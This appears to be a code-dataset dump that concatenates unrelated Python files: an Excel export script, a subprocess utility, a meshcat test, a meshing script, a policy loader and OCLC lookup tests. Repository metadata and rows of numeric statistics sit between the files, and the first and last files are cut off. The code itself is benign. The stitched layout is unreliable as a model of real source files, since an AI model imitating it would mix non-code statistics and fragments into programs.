            'id': self.id,
            'output': output_section,
            'sources': [source.to_dict() for source in self.sources],
        }
| 42.569231 | 104 | 0.597398 | 310 | 2,767 | 5.106452 | 0.309677 | 0.094757 | 0.04422 | 0.018951 | 0.078332 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006455 | 0.328153 | 2,767 | 64 | 105 | 43.234375 | 0.845078 | 0.331767 | 0 | 0 | 0 | 0 | 0.096118 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eaa5b05829f7dff5f8b3654295d561566cbd3dd | 861 | py | Python | Jaccorot/0014/0014.py | saurabh896/python-1 | f8d3aedf4c0fe6e24dfa3269ea7e642c9f7dd9b7 | [
"MIT"
] | 3,976 | 2015-01-01T15:49:39.000Z | 2022-03-31T03:47:56.000Z | Jaccorot/0014/0014.py | dwh65416396/python | 1a7e3edd1cd3422cc0eaa55471a0b42e004a9a1a | [
"MIT"
] | 97 | 2015-01-11T02:59:46.000Z | 2022-03-16T14:01:56.000Z | Jaccorot/0014/0014.py | dwh65416396/python | 1a7e3edd1cd3422cc0eaa55471a0b42e004a9a1a | [
"MIT"
] | 3,533 | 2015-01-01T06:19:30.000Z | 2022-03-28T13:14:54.000Z | #!/usr/bin/python
# coding=utf-8
"""
第 0014 题: 纯文本文件 student.txt为学生信息, 里面的内容(包括花括号)如下所示,
请将上述内容写到 student.xls 文件中,如下图所示:
"""
import os
import json
import xlwt
def read_txt(path):
    """Load a JSON document from a UTF-8 encoded text file and return it.

    Bug fix: under Python 3, open(path, 'r').read() already returns str,
    so the original .decode('utf-8') raised AttributeError. Open with an
    explicit encoding and let the json module parse the stream directly.
    """
    with open(path, 'r', encoding='utf-8') as f:
        return json.load(f)
def save_into_excel(content_dict, excel_name):
    """Write {name: [values...]} entries into an .xls workbook.

    One row per dictionary key (sorted by key); the key goes in column 0
    and its values fill the following columns.
    """
    workbook = xlwt.Workbook()
    sheet = workbook.add_sheet("student", cell_overwrite_ok=True)
    for row, (name, values) in enumerate(sorted(content_dict.items(), key=lambda item: item[0])):
        sheet.write(row, 0, name)
        for col, value in enumerate(values, start=1):
            sheet.write(row, col, value)
    workbook.save(excel_name)
if __name__ == "__main__":
    # Resolve student.txt relative to this script's own directory so the
    # program works regardless of the current working directory, then
    # dump the parsed records into student.xls.
    read_content = read_txt(os.path.join(os.path.split(__file__)[0], 'student.txt'))
    save_into_excel(read_content, 'student.xls')
| 20.023256 | 84 | 0.610918 | 135 | 861 | 3.681481 | 0.525926 | 0.016097 | 0.052314 | 0.052314 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020031 | 0.246225 | 861 | 42 | 85 | 20.5 | 0.745763 | 0.131243 | 0 | 0.083333 | 0 | 0 | 0.058345 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eac70af14d5975d4ffe25c63c27d1c08dbcf096 | 8,247 | py | Python | test/utils/gtclang-tester/gtclang_tester/utility.py | mroethlin/gtclang | 248b3637e3a438adc3bed3a684cee94798afff0b | [
"MIT"
] | 6 | 2017-10-10T18:56:54.000Z | 2020-05-28T15:29:19.000Z | test/utils/gtclang-tester/gtclang_tester/utility.py | twicki/gtclang | e87a7aa8612aad0df8c24117b9bbff6f8153a7fd | [
"MIT"
] | 125 | 2017-10-18T14:33:57.000Z | 2019-10-18T10:45:17.000Z | test/utils/gtclang-tester/gtclang_tester/utility.py | twicki/gtclang | e87a7aa8612aad0df8c24117b9bbff6f8153a7fd | [
"MIT"
] | 9 | 2017-09-20T12:57:49.000Z | 2019-08-26T09:32:20.000Z | #!/usr/bin/python3
# -*- coding: utf-8 -*-
##===-----------------------------------------------------------------------------*- Python -*-===##
## _ _
## | | | |
## __ _| |_ ___| | __ _ _ __ __ _
## / _` | __/ __| |/ _` | '_ \ / _` |
## | (_| | || (__| | (_| | | | | (_| |
## \__, |\__\___|_|\__,_|_| |_|\__, | - GridTools Clang DSL
## __/ | __/ |
## |___/ |___/
##
##
## This file is distributed under the MIT License (MIT).
## See LICENSE.txt for details.
##
##===------------------------------------------------------------------------------------------===##
##
## Several system related utility functions.
##
## Source: https://github.com/llvm-mirror/llvm/blob/master/utils/lit/lit/util.py with modification
## by Fabian Thuering
##
##===------------------------------------------------------------------------------------------===##
import os
import platform
import signal
import subprocess
import threading
import time
def to_bytes(str):
    """UTF-8-encode *str* and return the resulting binary data."""
    return str.encode('utf-8')
def to_string(bytes):
    """Return *bytes* unchanged when it is already a str; otherwise
    route it through to_bytes (preserving the original's behavior)."""
    return bytes if isinstance(bytes, str) else to_bytes(bytes)
def convert_string(bytes):
    """Best-effort conversion of a bytes-like object to str.

    UTF-8 decodes when possible; inputs without .decode (already str) or
    with undecodable contents fall back to plain str().
    """
    try:
        decoded = bytes.decode('utf-8')
    except AttributeError:  # 'str' object has no attribute 'decode'.
        return str(bytes)
    except UnicodeError:
        return str(bytes)
    return to_string(decoded)
def levenshtein(source, target):
    """ From Wikipedia article; Iterative with two matrix rows. """
    if source == target:
        return 0
    if not source:
        return len(target)
    if not target:
        return len(source)
    # previous holds row i of the edit-distance matrix, current row i+1
    previous = list(range(len(target) + 1))
    for i, src_ch in enumerate(source):
        current = [i + 1]
        for j, tgt_ch in enumerate(target):
            substitution = previous[j] + (0 if src_ch == tgt_ch else 1)
            current.append(min(current[j] + 1, previous[j + 1] + 1, substitution))
        previous = current
    return previous[len(target)]
def detectCPUs():
    """
    Detects the number of CPUs on a system. Cribbed from pp.
    """
    # NOTE(review): modern Python offers os.cpu_count(); this hand-rolled
    # probe is kept for parity with upstream lit.
    # Linux, Unix and MacOS:
    if hasattr(os, "sysconf"):
        if "SC_NPROCESSORS_ONLN" in os.sysconf_names:
            # Linux & Unix:
            ncpus = os.sysconf("SC_NPROCESSORS_ONLN")
            if isinstance(ncpus, int) and ncpus > 0:
                return ncpus
        else:  # OSX: sysconf exists but lacks the key; shell out to sysctl.
            return int(capture(['sysctl', '-n', 'hw.ncpu']))
    # Windows:
    if "NUMBER_OF_PROCESSORS" in os.environ:
        ncpus = int(os.environ["NUMBER_OF_PROCESSORS"])
        if ncpus > 0:
            # With more than 32 processes, process creation often fails with
            # "Too many open files". FIXME: Check if there's a better fix.
            return min(ncpus, 32)
    return 1  # Default
def capture(args, env=None):
    """capture(command) - Run the given command (or argv list) in a shell and
    return the standard output. Raises a CalledProcessError if the command
    exits with a non-zero status."""
    process = subprocess.Popen(args, stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE, env=env)
    stdout, stderr = process.communicate()
    stdout = convert_string(stdout)
    stderr = convert_string(stderr)
    if process.returncode != 0:
        raise subprocess.CalledProcessError(
            cmd=args,
            returncode=process.returncode,
            output="{}\n{}".format(stdout, stderr))
    return stdout
class ExecuteCommandTimeoutException(Exception):
    """Raised by executeCommand when its timeout fires; carries the
    output collected so far plus the exit code of the killed process."""

    def __init__(self, msg, out, err, exitCode):
        # Sanity-check the field types up front (assertions, as upstream).
        for value, expected_type in ((msg, str), (out, str), (err, str), (exitCode, int)):
            assert isinstance(value, expected_type)
        self.msg = msg
        self.out = out
        self.err = err
        self.exitCode = exitCode
# Close extra file handles on UNIX (on Windows this cannot be done while
# also redirecting input). Passed as close_fds= to every Popen below.
kUseCloseFDs = not (platform.system() == 'Windows')
def asyncExecuteCommand(commands, cwds, env=None):
    """Run several commands concurrently and collect their results.

    Args:
        commands: list of commands (argv lists or strings), one per process
        cwds: working directory for each command, parallel to *commands*
        env: environment dict shared by all processes, or None
    Returns:
        list of (out, err, exitcode) tuples in the same order as *commands*.
    """
    running_procs = [
        (subprocess.Popen(command, cwd=cwd,
                          stdin=subprocess.PIPE,
                          stdout=subprocess.PIPE,
                          stderr=subprocess.PIPE,
                          env=env, close_fds=kUseCloseFDs), idx)
        for idx, (command, cwd) in enumerate(zip(commands, cwds))
    ]
    results = len(commands) * [None]
    # Poll the still-running processes until all have finished.
    # (Two leftover debug print() calls were removed here.)
    while running_procs:
        for proc, idx in running_procs:
            retcode = proc.poll()
            if retcode is not None:  # Process finished.
                out, err = proc.communicate()
                results[idx] = (out, err, retcode)
                running_procs.remove((proc, idx))
                break
        else:  # No process is done, wait a bit and check again.
            time.sleep(.1)
    return results
def executeCommand(command, cwd=None, env=None, input=None, timeout=0):
    """
    Execute command ``command`` (list of arguments or string)
    with
    * working directory ``cwd`` (str), use None to use the current
    working directory
    * environment ``env`` (dict), use None for none
    * Input to the command ``input`` (str), use string to pass
    no input.
    * Max execution time ``timeout`` (int) seconds. Use 0 for no timeout.
    Returns a tuple (out, err, exitCode) where
    * ``out`` (str) is the standard output of running the command
    * ``err`` (str) is the standard error of running the command
    * ``exitCode`` (int) is the exitCode of running the command
    If the timeout is hit an ``ExecuteCommandTimeoutException``
    is raised.
    """
    p = subprocess.Popen(command, cwd=cwd,
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE,
                         env=env, close_fds=kUseCloseFDs)
    timerObject = None
    # One-element list so the killProcess closure can flag the timeout
    # across the thread boundary (Python 2 had no 'nonlocal').
    hitTimeOut = [False]
    try:
        if timeout > 0:
            def killProcess():
                # We may be invoking a shell so we need to kill the
                # process and all its children.
                hitTimeOut[0] = True
                killProcessAndChildren(p.pid)

            timerObject = threading.Timer(timeout, killProcess)
            timerObject.start()

        out, err = p.communicate(input=input)
        exitCode = p.wait()
    finally:
        # Always cancel the watchdog, even if communicate() raised.
        if timerObject != None:
            timerObject.cancel()

    # Ensure the resulting output is always of string type.
    out = convert_string(out)
    err = convert_string(err)

    if hitTimeOut[0]:
        raise ExecuteCommandTimeoutException(
            msg='Reached timeout of {} seconds'.format(timeout),
            out=out,
            err=err,
            exitCode=exitCode
        )

    # Detect Ctrl-C in subprocess.
    if exitCode == -signal.SIGINT:
        raise KeyboardInterrupt

    return out, err, exitCode
def killProcessAndChildren(pid):
    """
    This function kills a process with ``pid`` and all its
    running children (recursively). It is currently implemented
    using the psutil module which provides a simple platform
    neutral implementation.
    """
    # Imported lazily so psutil is only required when a timeout fires.
    import psutil
    try:
        psutilProc = psutil.Process(pid)
        # Handle the different psutil API versions
        try:
            # psutil >= 2.x
            children_iterator = psutilProc.children(recursive=True)
        except AttributeError:
            # psutil 1.x
            children_iterator = psutilProc.get_children(recursive=True)
        for child in children_iterator:
            try:
                child.kill()
            except psutil.NoSuchProcess:
                # Child already exited between enumeration and kill.
                pass
        psutilProc.kill()
    except psutil.NoSuchProcess:
        # The target process already exited; nothing to do.
        pass
| 33.388664 | 100 | 0.532921 | 877 | 8,247 | 4.90992 | 0.334094 | 0.015327 | 0.009289 | 0.018114 | 0.111937 | 0.081746 | 0.081746 | 0.081746 | 0.071064 | 0.052485 | 0 | 0.008723 | 0.332727 | 8,247 | 246 | 101 | 33.52439 | 0.77376 | 0.337456 | 0 | 0.174825 | 0 | 0 | 0.029186 | 0 | 0 | 0 | 0 | 0.004065 | 0.027972 | 1 | 0.076923 | false | 0.013986 | 0.048951 | 0.006993 | 0.251748 | 0.013986 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5eb21f50c3a708d9eb64cb1111bacf94011dc947 | 554 | py | Python | src/meshcat/tests/test_start_server.py | Arpafaucon/meshcat-python | c3a9ceaa2b82ba1146b174d901a63269a9b5432f | [
"MIT"
] | 150 | 2018-02-25T23:38:05.000Z | 2022-03-11T11:56:20.000Z | src/meshcat/tests/test_start_server.py | Arpafaucon/meshcat-python | c3a9ceaa2b82ba1146b174d901a63269a9b5432f | [
"MIT"
] | 104 | 2018-02-23T22:16:24.000Z | 2022-03-23T13:22:26.000Z | src/meshcat/tests/test_start_server.py | Arpafaucon/meshcat-python | c3a9ceaa2b82ba1146b174d901a63269a9b5432f | [
"MIT"
] | 45 | 2018-03-15T20:13:28.000Z | 2022-02-15T09:12:44.000Z | import unittest
from meshcat.servers.zmqserver import start_zmq_server_as_subprocess
class TestStartZmqServer(unittest.TestCase):
    """
    Test the StartZmqServerAsSubprocess method.
    """

    def test_default_args(self):
        # With no arguments the returned web URL points at loopback.
        proc, zmq_url, web_url = start_zmq_server_as_subprocess()
        self.assertIn("127.0.0.1", web_url)

    def test_ngrok(self):
        # With --ngrok_http_tunnel the web URL is expected to be a public
        # tunnel address rather than loopback.
        proc, zmq_url, web_url = start_zmq_server_as_subprocess( server_args=["--ngrok_http_tunnel"])
        self.assertIsNotNone(web_url)
        self.assertNotIn("127.0.0.1", web_url)
5eb5ea4f079264cee855d8779563ead4bcecdf9b | 702 | py | Python | sandbox/play_options.py | MiroK/mbed | d4c47151131c9e3502bec344218c7fd112044dce | [
"MIT"
] | 2 | 2017-07-07T11:13:11.000Z | 2019-01-03T17:58:28.000Z | sandbox/play_options.py | MiroK/Mbed | d4c47151131c9e3502bec344218c7fd112044dce | [
"MIT"
] | null | null | null | sandbox/play_options.py | MiroK/Mbed | d4c47151131c9e3502bec344218c7fd112044dce | [
"MIT"
] | null | null | null | from mbed.generation import make_line_mesh
from mbed.meshing import embed_mesh1d
import numpy as np
import sys
coords = np.array([[0, 0], [1, 0], [1, 1], [0, 1.]])
mesh1d = make_line_mesh(coords, close_path=True)
embed_mesh1d(mesh1d,
bounding_shape=0.1,
how='as_lines',
gmsh_args=sys.argv,
save_geo='model',
save_msh='model',
save_embedding='test_embed_line')
print()
embed_mesh1d(mesh1d,
bounding_shape=0.1,
how='as_points',
gmsh_args=sys.argv,
save_geo='model',
save_msh='model',
niters=2,
save_embedding='test_embed_point')
| 24.206897 | 52 | 0.57265 | 91 | 702 | 4.153846 | 0.428571 | 0.026455 | 0.063492 | 0.132275 | 0.402116 | 0.402116 | 0.402116 | 0.402116 | 0.402116 | 0.206349 | 0 | 0.039337 | 0.311966 | 702 | 28 | 53 | 25.071429 | 0.743271 | 0 | 0 | 0.454545 | 0 | 0 | 0.097004 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ec075408ba7dc145746d172546ed75b28e26a20 | 1,015 | py | Python | policy_loader.py | donghun2018/adclick-simulator | 2fc8a939a1d44865cf5a391a3d672ca47e45a058 | [
"MIT"
] | 2 | 2020-11-18T03:37:27.000Z | 2021-06-19T03:51:56.000Z | policy_loader.py | donghun2018/adclick-simulator | 2fc8a939a1d44865cf5a391a3d672ca47e45a058 | [
"MIT"
] | null | null | null | policy_loader.py | donghun2018/adclick-simulator | 2fc8a939a1d44865cf5a391a3d672ca47e45a058 | [
"MIT"
] | null | null | null | """
Loads policies by
1. load the list of PUID from "puid_list.csv"
2. load "Policy_<PUID>" class that is defined in ./Policies/<PUID>.py
by Donghun Lee 2018
"""
import csv
from importlib import import_module
def get_pols():
    """Import Policies.<PUID> for every PUID in puid_list.csv and return
    the corresponding Policy_<PUID> classes, in file order."""
    policies = []
    for puid in get_puids():
        module = import_module("Policies" + "." + puid)
        policies.append(getattr(module, "Policy_" + puid))
    return policies
def get_puids():
    """Read policy UIDs from puid_list.csv (first column, one per row).

    Blank rows are skipped so a trailing newline or empty line in the
    file no longer raises IndexError on row[0].
    """
    with open("puid_list.csv") as ifh:
        reader = csv.reader(ifh)
        puids = [row[0] for row in reader if row]
    return puids
if __name__ == "__main__":
    # Smoke-test the loader: instantiate every discovered policy and
    # print its id, bid space, and one sample bid.
    # this is how you can use the policy loader in other files -- DH
    #from policy_loader import get_pols
    pols = get_pols()
    for pol in pols:
        policy = pol()
        print("policy name = " + policy.id())
        print("policy_bidspace = " + str(policy.bid_space))
        print("a sample bid : " + str(policy.bid()))
| 26.710526 | 70 | 0.637438 | 154 | 1,015 | 4.019481 | 0.428571 | 0.033926 | 0.035541 | 0.042003 | 0.058158 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009103 | 0.242365 | 1,015 | 37 | 71 | 27.432432 | 0.795839 | 0.248276 | 0 | 0 | 0 | 0 | 0.111406 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.142857 | 0 | 0.333333 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5ec654e8773eaea1ffae8ab9316677812ce2b191 | 11,998 | py | Python | cid-minting/tests/test_oclc_lookup.py | cdlib/zephir-services | 87597190302114aea7d3ae694181eeaffa9d63fc | [
"BSD-3-Clause"
] | 1 | 2018-11-15T21:33:32.000Z | 2018-11-15T21:33:32.000Z | cid-minting/tests/test_oclc_lookup.py | cdlib/zephir-services | 87597190302114aea7d3ae694181eeaffa9d63fc | [
"BSD-3-Clause"
] | 17 | 2018-11-30T19:43:56.000Z | 2021-12-08T00:45:18.000Z | cid-minting/tests/test_oclc_lookup.py | cdlib/zephir-services | 87597190302114aea7d3ae694181eeaffa9d63fc | [
"BSD-3-Clause"
] | 2 | 2018-11-30T19:29:48.000Z | 2019-01-29T23:24:23.000Z | import os
import msgpack
import pytest
import plyvel
from click.testing import CliRunner
from oclc_lookup import get_primary_ocn
from oclc_lookup import get_ocns_cluster_by_primary_ocn
from oclc_lookup import get_ocns_cluster_by_ocn
from oclc_lookup import get_clusters_by_ocns
from oclc_lookup import convert_set_to_list
from oclc_lookup import lookup_ocns_from_oclc
from oclc_lookup import main
# TESTS
def test_get_primary_ocn(setup):
    """Every ocn in the primary.csv fixture resolves to its expected primary ocn."""
    # Cleanup: the unused cluster_db_path local was removed, and the
    # builtin-shadowing name `input` renamed.
    primary_db_path = setup["primary_db_path"]
    inquiry_ocns = list(setup["dfs"]["primary.csv"]["ocn"])
    expect = list(setup["dfs"]["primary.csv"]["primary"])
    result = [
        get_primary_ocn(ocn, primary_db_path)
        for ocn in inquiry_ocns
    ]
    assert sorted(expect) == sorted(result)
def test_get_primary_ocn_with_null_cases(setup):
    """get_primary_ocn returns None for a None ocn and for an unknown ocn."""
    # Cleanup: unused cluster_db_path removed; `== None` replaced with
    # the idiomatic identity check (PEP 8 / E711).
    primary_db_path = setup["primary_db_path"]
    # case: ocn passed is None
    assert get_primary_ocn(None, primary_db_path) is None
    # case: ocn not in the database
    assert get_primary_ocn(0, primary_db_path) is None
def test_get_ocns_cluster_by_primary_ocn(setup):
    """A primary ocn maps to the other ocns of its cluster."""
    # Cleanup: unused primary_db_path local removed.
    cluster_db_path = setup["cluster_db_path"]
    primary_ocn = 1
    cluster = [9987701, 53095235, 433981287, 6567842]
    result = get_ocns_cluster_by_primary_ocn(primary_ocn, cluster_db_path)
    assert sorted(cluster) == sorted(result)
def test_get_cluster_missing_primary(setup):
    """The primary ocn itself is not part of the returned cluster list."""
    # Cleanup: unused primary_db_path local removed.
    cluster_db_path = setup["cluster_db_path"]
    primary_ocn = 1
    result = get_ocns_cluster_by_primary_ocn(primary_ocn, cluster_db_path)
    assert primary_ocn not in result
def test_get_ocns_cluster_by_primary_ocn_2(setup):
    """A two-ocn cluster returns only its single secondary ocn."""
    # Cleanup: unused primary_db_path local removed.
    cluster_db_path = setup["cluster_db_path"]
    primary_ocn = 17216714
    cluster = [535434196]
    result = get_ocns_cluster_by_primary_ocn(primary_ocn, cluster_db_path)
    assert sorted(cluster) == sorted(result)
def test_get_cluster_ocn_with_null_cases(setup):
    """Single-ocn clusters, secondary ocns, invalid ocns and None all yield None."""
    # Cleanup: unused primary_db_path removed; `None ==` replaced with
    # the idiomatic identity check (PEP 8 / E711).
    cluster_db_path = setup["cluster_db_path"]
    null_cases = {
        "cluster_of_one_ocn": 1000000000,
        "secondary_ocn": 6567842,
        "invalid_ocn": 1234567890,
        "none_ocn": None,
    }
    for ocn in null_cases.values():
        assert get_ocns_cluster_by_primary_ocn(ocn, cluster_db_path) is None
def test_get_ocns_cluster_by_ocn(setup):
    """Any member ocn — primary or secondary — resolves to its full cluster."""
    primary_db_path = setup["primary_db_path"]
    cluster_db_path = setup["cluster_db_path"]
    cases = [
        (1000000000, [1000000000]),                             # cluster of one ocn
        (1, [6567842, 9987701, 53095235, 433981287, 1]),        # multi-ocn cluster via primary
        (6567842, [1, 6567842, 9987701, 53095235, 433981287]),  # multi-ocn cluster via secondary
        (17216714, [17216714, 535434196]),                      # two-ocn cluster via primary
    ]
    for ocn, cluster in cases:
        result = get_ocns_cluster_by_ocn(ocn, primary_db_path, cluster_db_path)
        assert sorted(cluster) == sorted(result)
def test_get_ocns_cluster_by_ocn_with_null_cases(setup):
    """Invalid and None ocns resolve to no cluster at all."""
    # Cleanup: `None ==` replaced with the idiomatic identity check (E711).
    primary_db_path = setup["primary_db_path"]
    cluster_db_path = setup["cluster_db_path"]
    null_cases = {
        "invalid_ocn": 1234567890,
        "none_ocn": None,
    }
    for ocn in null_cases.values():
        assert get_ocns_cluster_by_ocn(ocn, primary_db_path, cluster_db_path) is None
def test_get_ocns_cluster_by_ocns(setup):
    """Ocn lists (with dups/invalid entries) resolve to the union of matched clusters."""
    # Cleanup: removed two leftover debug print() calls, the redundant
    # `result != None` assertion, and the unused `clusters` dict.
    primary_db_path = setup["primary_db_path"]
    cluster_db_path = setup["cluster_db_path"]
    sets = {
        1000000000: {(1000000000,)},
        1: {(1, 6567842, 9987701, 53095235, 433981287)},
        17216714: {(17216714, 535434196)},
    }
    input_ocns_list = {
        "1_one_primary_ocn_cluster_of_one": [1000000000],
        "2_one_other_ocn_cluster_of_multi": [6567842],
        "3_two_primary_ocns_dups": [1000000000, 1000000000],
        "4_two_primary_ocns": [1, 1000000000],
        "5_ocns_with_primary_secondary_dups_invalid": [1, 1, 6567842, 17216714, 535434196, 12345678901, 1000000000],
    }
    expected_set = {
        "1_one_primary_ocn_cluster_of_one": sets[1000000000],
        "2_one_other_ocn_cluster_of_multi": sets[1],
        "3_two_primary_ocns_dups": sets[1000000000],
        "4_two_primary_ocns": (sets[1] | sets[1000000000]),
        "5_ocns_with_primary_secondary_dups_invalid": (sets[1] | sets[17216714] | sets[1000000000]),
    }
    for case, ocns in input_ocns_list.items():
        result = get_clusters_by_ocns(ocns, primary_db_path, cluster_db_path)
        assert result == expected_set[case]
def test_get_ocns_cluster_by_ocns_wthnull_cases(setup):
    """Inquiries containing only invalid ocns (or nothing) match no clusters."""
    primary_db_path = setup["primary_db_path"]
    cluster_db_path = setup["cluster_db_path"]
    no_match_inquiries = [
        [1234567890],                # one invalid ocn
        [1234567890, 12345678901],   # two invalid ocns
        [],                          # no ocns
    ]
    for ocns in no_match_inquiries:
        assert get_clusters_by_ocns(ocns, primary_db_path, cluster_db_path) == set()
def test_convert_set_to_list():
    """Sets of ocn tuples convert to lists of ocn lists, preserving grouping."""
    multi = (1, 6567842, 9987701, 53095235, 433981287)
    cases = [
        ({(1000000000,)}, [[1000000000]]),                    # one tuple, single item
        ({multi}, [list(multi)]),                             # one tuple, multiple items
        ({(1000000000,), multi}, [[1000000000], list(multi)]),  # two tuples
        (set(), []),                                          # empty set
    ]
    for a_set, expected in cases:
        assert convert_set_to_list(a_set) == expected
def test_lookup_ocns_from_oclc(setup):
    """End-to-end lookup: each inquiry list must echo back in the result
    together with the matched clusters and their count."""
    primary_db_path = setup["primary_db_path"]
    cluster_db_path = setup["cluster_db_path"]
    # Inquiry lists keyed by scenario name; 1234567890/12345678901 are
    # ocns absent from the fixture databases.
    input_ocns = {
        "one_ocn_primary_single_cluster": [1000000000],
        "one_ocn_primary_multi_cluster": [1],
        "one_other_ocn": [6567842],
        "two_ocns": [1000000000, 6567842],
        "one_invalid": [1234567890],
        "two_invalid": [1234567890, 12345678901],
    }
    # Expected result dict per scenario, mirroring lookup_ocns_from_oclc's
    # return shape: inquiry echo, matched clusters, and their count.
    expected = {
        "one_ocn_primary_single_cluster": {
            "inquiry_ocns": [1000000000],
            "matched_oclc_clusters": [[1000000000]],
            "num_of_matched_oclc_clusters": 1,
        },
        "one_ocn_primary_multi_cluster": {
            "inquiry_ocns": [1],
            "matched_oclc_clusters": [[1, 6567842, 9987701, 53095235, 433981287]],
            "num_of_matched_oclc_clusters": 1,
        },
        "one_other_ocn": {
            "inquiry_ocns": [6567842],
            "matched_oclc_clusters": [[1, 6567842, 9987701, 53095235, 433981287]],
            "num_of_matched_oclc_clusters": 1,
        },
        "two_ocns": {
            "inquiry_ocns": [1000000000, 6567842],
            "matched_oclc_clusters": [[1000000000], [1, 6567842, 9987701, 53095235, 433981287]],
            "num_of_matched_oclc_clusters": 2,
        },
        "one_invalid": {
            "inquiry_ocns": [1234567890],
            "matched_oclc_clusters": [],
            "num_of_matched_oclc_clusters": 0,
        },
        "two_invalid": {
            "inquiry_ocns": [1234567890, 12345678901],
            "matched_oclc_clusters": [],
            "num_of_matched_oclc_clusters": 0,
        },
    }
    for k, ocns in input_ocns.items():
        result = lookup_ocns_from_oclc(ocns, primary_db_path, cluster_db_path)
        assert result["inquiry_ocns"] == ocns
        assert result["matched_oclc_clusters"] == expected[k]["matched_oclc_clusters"]
        assert result["num_of_matched_oclc_clusters"] == expected[k]["num_of_matched_oclc_clusters"]
# TEST cmd line options
def test_main(setup):
    """Exercise the click CLI: no args, -t/--test flags, and ocn lookups."""
    runner = CliRunner()

    # No arguments: usage text plus non-zero exit.
    result = runner.invoke(main)
    assert result.exit_code == 1
    assert 'Usage' in result.output

    # -t / --test run the built-in test mode.
    result = runner.invoke(main, ['-t'])
    #assert result.exit_code == 0
    assert 'Running tests ...' in result.output
    result = runner.invoke(main, ['--test'])
    #assert result.exit_code == 0
    assert 'Running tests ...' in result.output

    # Single and multiple ocn lookups print the matched cluster sets.
    result = runner.invoke(main, ['1'])
    assert result.output == '{(1, 6567842, 9987701, 53095235, 433981287)}\n'
    result = runner.invoke(main, ['2'])
    assert result.output == '{(2, 9772597, 35597370, 60494959, 813305061, 823937796, 1087342349)}\n'
    result = runner.invoke(main, ['1', '2'])
    assert result.output == '{(2, 9772597, 35597370, 60494959, 813305061, 823937796, 1087342349), (1, 6567842, 9987701, 53095235, 433981287)}\n'

    # '123' is not in the test db
    result = runner.invoke(main, ['123'])
    assert result.output == 'set()\n'
# FIXTURES
@pytest.fixture
def setup(tmpdatadir, csv_to_df_loader):
    # Build the two LevelDB fixtures from primary.csv and point the module
    # under test at them via environment-variable overrides.
    dfs = csv_to_df_loader
    primary_db_path = create_primary_db(tmpdatadir, dfs["primary.csv"])
    cluster_db_path = create_cluster_db(tmpdatadir, dfs["primary.csv"])
    os.environ["OVERRIDE_PRIMARY_DB_PATH"] = primary_db_path
    os.environ["OVERRIDE_CLUSTER_DB_PATH"] = cluster_db_path
    return {
        "tmpdatadir": tmpdatadir,
        "dfs": dfs,
        "primary_db_path": primary_db_path,
        "cluster_db_path": cluster_db_path
    }
# HELPERS
def int_to_bytes(inum):
    """Big-endian byte string for *inum*, using the minimum whole-byte width."""
    width = (inum.bit_length() + 7) // 8
    return inum.to_bytes(width, "big")
def int_from_bytes(bnum):
    """Inverse of int_to_bytes: interpret *bnum* as a big-endian integer."""
    return int.from_bytes(bnum, byteorder="big")
def create_primary_db(path, df):
    """Create a primary ocn lookup LevelDB database based with test data
    Note:
    1) Expects a dataframe: [ocn, primary]
    Args:
    Path: Database path
    df: Pandas dataframe of test data [ocn, primary]
    Returns:
    Path to the LevelDB database
    """
    db_path = os.path.join(path, "primary/")
    db = plyvel.DB(db_path, create_if_missing=True)
    # Insert in ascending ocn order; keys and values are big-endian ints.
    df = df.sort_values(by=["ocn"])
    # itertuples() rows are 1-indexed (index 0 is the dataframe index),
    # hence the +1 offsets on the column positions.
    ocn_pos = df.columns.get_loc("ocn") + 1
    primary_pos = df.columns.get_loc("primary") + 1
    for row in df.itertuples():
        db.put(int_to_bytes(row[ocn_pos]), int_to_bytes(row[primary_pos]))
    db.close()
    return db_path
def create_cluster_db(path, df):
    """Create a cluster ocns lookup LevelDB database based with test data
    Note:
    1) Expects a dataframe: [ocn, primary]
    2) Produces a LevelDB with key(primary) and value([ocns,...])
    3) Primary-only clusters are excluded
    Args:
    Path: Database path
    df: Pandas dataframe of test data [ocn, primary]
    Returns:
    Path to the LevelDB database
    """
    db_path = os.path.join(path, "cluster/")
    db = plyvel.DB(db_path, create_if_missing=True)
    packer = msgpack.Packer()
    # Sort so all rows of one cluster are contiguous; then do a single
    # group-by-change-of-key pass over the rows.
